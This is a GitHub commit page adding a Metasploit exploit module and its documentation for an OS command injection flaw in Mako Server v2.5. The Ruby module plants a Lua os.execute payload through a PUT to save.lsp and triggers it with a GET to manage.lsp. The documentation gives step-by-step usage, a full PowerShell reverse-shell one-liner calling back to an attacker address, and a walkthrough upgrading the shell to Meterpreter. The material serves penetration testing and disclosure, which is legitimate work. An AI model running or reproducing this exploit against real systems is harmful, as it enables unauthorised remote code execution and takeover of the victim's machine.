Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #9133, Command injection in Mako Server examples
- Loading branch information
Showing
2 changed files
with
288 additions
and
0 deletions.
There are no files selected for viewing
163 changes: 163 additions & 0 deletions
163
documentation/modules/exploit/windows/http/makoserver_cmd_exec.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,163 @@ | ||
## Description | ||
|
||
This module exploits a vulnerability found in Mako Server v2.5. | ||
It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp. | ||
|
||
Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391 | ||
|
||
## Vulnerable Application | ||
|
||
[Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications. | ||
|
||
This module has been verified against the following Mako Server versions for Windows XP SP3 and Windows 7 SP1 (x86/x64): | ||
- v2.5 | ||
|
||
Links: | ||
- [Windows installer](https://makoserver.net/download/mako.windows.x86.exe) | ||
- [Windows download page](https://makoserver.net/download/windows) | ||
- [Documentation](https://makoserver.net/documentation/manual/) | ||
|
||
## References for vulnerability | ||
- https://blogs.securiteam.com/index.php/archives/3391 | ||
- https://www.exploit-db.com/exploits/42683 | ||
|
||
## Verification Steps | ||
|
||
1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work) | ||
2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop | ||
3. Start msfconsole on host | ||
4. Do: ```use exploit/windows/http/makoserver_cmd_exec``` | ||
5. Do: ```set RHOST <IP address of target system>``` | ||
6. Do: ```set PAYLOAD cmd/windows/reverse_powershell``` | ||
7. Do: ```set LHOST <IP address of host system>``` | ||
8. Do: ```exploit``` | ||
9. You should get a Windows command shell | ||
|
||
## Example Output | ||
``` | ||
msf > use exploit/windows/http/makoserver_cmd_exec | ||
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 | ||
RHOST => 10.10.10.3 | ||
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell | ||
PAYLOAD => cmd/windows/reverse_powershell | ||
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 | ||
LHOST => 10.10.10.2 | ||
msf exploit(makoserver_cmd_exec) > exploit | ||
[*] Started reverse TCP handler on 10.10.10.2:4444 | ||
[*] Sending payload to target... | ||
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400 | ||
Microsoft Windows | ||
Copyright (c) 2009 Microsoft Corporation. All rights reserved. | ||
C:\Users\Smith\Downloads\MakoServer> | ||
``` | ||
|
||
## Example Verbose Output | ||
``` | ||
msf > use exploit/windows/http/makoserver_cmd_exec | ||
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 | ||
RHOST => 10.10.10.3 | ||
msf exploit(makoserver_cmd_exec) > set VERBOSE true | ||
VERBOSE => true | ||
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell | ||
PAYLOAD => cmd/windows/reverse_powershell | ||
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 | ||
LHOST => 10.10.10.2 | ||
msf exploit(makoserver_cmd_exec) > check | ||
[*] Trying to detect running Mako Server and necessary files... | ||
[*] Mako Server save.lsp returns correct ouput. | ||
[*] 10.10.10.3:80 The target appears to be vulnerable. | ||
msf exploit(makoserver_cmd_exec) > exploit | ||
[*] Started reverse TCP handler on 10.10.10.2:4444 | ||
[*] Sending payload to target... | ||
[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]]) | ||
[*] Sending PUT request to save.lsp... | ||
[*] Sending GET request to manage.lsp... | ||
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400 | ||
Microsoft Windows | ||
Copyright (c) 2009 Microsoft Corporation. All rights reserved. | ||
C:\Users\Smith\Downloads\MakoServer> | ||
``` | ||
|
||
## Scenarios | ||
|
||
### Targeting Windows 7 SP1 x64 running Mako Server v2.5 | ||
|
||
A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session: | ||
|
||
``` | ||
msf > use exploit/windows/http/makoserver_cmd_exec | ||
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 | ||
RHOST => 10.10.10.2 | ||
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell | ||
PAYLOAD => cmd/windows/reverse_powershell | ||
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4 | ||
LHOST => 10.10.10.4 | ||
msf exploit(makoserver_cmd_exec) > check | ||
[*] 10.10.10.2:80 The target appears to be vulnerable. | ||
msf exploit(makoserver_cmd_exec) > exploit | ||
[*] Started reverse TCP handler on 10.10.10.4:4444 | ||
[*] Sending payload to target... | ||
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400 | ||
Microsoft Windows | ||
Copyright (c) Microsoft Corporation. All rights reserved. | ||
C:\Users\Smith\Downloads\MakoServer>^Z | ||
Background session 1? [y/N] y | ||
msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter | ||
msf post(shell_to_meterpreter) > sessions -l | ||
Active sessions | ||
=============== | ||
Id Name Type Information Connection | ||
-- ---- ---- ----------- ---------- | ||
1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) | ||
msf post(shell_to_meterpreter) > set SESSION 1 | ||
SESSION => 1 | ||
msf post(shell_to_meterpreter) > set LPORT 8080 | ||
LPORT => 8080 | ||
msf post(shell_to_meterpreter) > exploit | ||
[*] Upgrading session ID: 1 | ||
[*] Starting exploit/multi/handler | ||
[*] Started reverse TCP handler on 10.10.10.4:8080 | ||
[-] Powershell is not installed on the target. | ||
[*] Command stager progress: 1.66% (1699/102108 bytes) | ||
... | ||
[*] Command stager progress: 100.00% (102108/102108 bytes) | ||
[*] Post module execution completed | ||
msf post(shell_to_meterpreter) > sessions -l | ||
Active sessions | ||
=============== | ||
Id Name Type Information Connection | ||
-- ---- ---- ----------- ---------- | ||
1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) | ||
2 meterpreter x86/windows smith-PC\smith @ SMITH-PC 10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2) | ||
msf post(shell_to_meterpreter) > sessions -i 2 | ||
[*] Starting interaction with 2... | ||
meterpreter > getuid | ||
Server username: smith-PC\smith | ||
meterpreter > sysinfo | ||
Computer : SMITH-PC | ||
OS : Windows 7 (Build 7601, Service Pack 1). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 2 | ||
Meterpreter : x86/windows | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,125 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = GoodRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Mako Server v2.5 OS Command Injection RCE', | ||
'Description' => %q{ | ||
This module exploits a vulnerability found in Mako Server v2.5. | ||
It's possible to inject arbitrary OS commands in the Mako Server | ||
tutorial page through a PUT request to save.lsp. | ||
Attacker input will be saved on the victims machine and can | ||
be executed by sending a GET request to manage.lsp. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC | ||
'Steven Patterson (Shogun Lab) <steven[at]shogunlab.com>' # Metasploit module | ||
], | ||
'References' => | ||
[ | ||
['EDB', '42683'], | ||
['URL', 'https://blogs.securiteam.com/index.php/archives/3391'] | ||
], | ||
'Arch' => ARCH_CMD, | ||
'Platform' => 'win', | ||
'Targets' => | ||
[ | ||
['Mako Server v2.5 - Windows x86/x64', { }] | ||
], | ||
'DefaultTarget' => 0, | ||
'Privileged' => false, | ||
'DisclosureDate' => 'Sep 3 2017')) | ||
|
||
register_options( | ||
[ | ||
OptString.new('URI', [true, 'URI path to the Mako Server app', '/']) | ||
] | ||
) | ||
end | ||
|
||
def check | ||
vprint_status('Trying to detect running Mako Server and necessary files...') | ||
|
||
# Send GET request to determine existence of save.lsp page | ||
res = send_request_cgi({ | ||
'method' => 'GET', | ||
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp') | ||
}, 20) | ||
|
||
# If response does not include "MakoServer.net", target is not viable. | ||
if res.headers['Server'] !~ /MakoServer.net/ | ||
vprint_warning('Target is not a Mako Server.') | ||
return CheckCode::Safe | ||
end | ||
|
||
if res.body | ||
if res.body =~ /Incorrect usage/ | ||
# We are able to determine that the server has a save.lsp page and | ||
# returns the correct output. | ||
vprint_status('Mako Server save.lsp returns correct ouput.') | ||
return CheckCode::Appears | ||
else | ||
# The page exists, but is not returning the expected output. | ||
# May be a different version? | ||
vprint_warning('Mako Server save.lsp did not return expected output.') | ||
return CheckCode::Detected | ||
end | ||
else | ||
# The above checks failed and exploitability could not be determined. | ||
vprint_error('Unable to determine exploitability, save.lsp not found.') | ||
return CheckCode::Unknown | ||
end | ||
|
||
return CheckCode::Safe | ||
end | ||
|
||
def exploit | ||
print_status('Sending payload to target...') | ||
|
||
# The double square brackets helps to ensure single/double quotes | ||
# in cmd payload do not interfere with syntax of os.execute Lua function. | ||
cmd = %{os.execute([[#{payload.encoded}]])} | ||
|
||
# If users want to troubleshoot their cmd payloads, they can see the | ||
# Lua function with params that the module uses in a more verbose mode. | ||
vprint_status("Now executing the following command: #{cmd}") | ||
|
||
# Send a PUT request to save.lsp with command payload | ||
begin | ||
vprint_status('Sending PUT request to save.lsp...') | ||
send_request_cgi({ | ||
'method' => 'PUT', | ||
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'), | ||
'ctype' => 'text/plain', | ||
'data' => cmd, | ||
'http' => { | ||
'X-Requested-With' => 'XMLHttpRequest', | ||
'Referer' => 'http://localhost/Lua-Types.lsp' | ||
} | ||
}, 20) | ||
rescue StandardError => e | ||
fail_with(Failure::NoAccess, "Error: #{e}") | ||
end | ||
|
||
# Send a GET request to manage.lsp with execute set to true | ||
begin | ||
vprint_status('Sending GET request to manage.lsp...') | ||
send_request_cgi({ | ||
'method' => 'GET', | ||
'uri' => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua') | ||
}, 20) | ||
rescue StandardError => e | ||
fail_with(Failure::NoAccess, "Error: #{e}") | ||
end | ||
end | ||
end |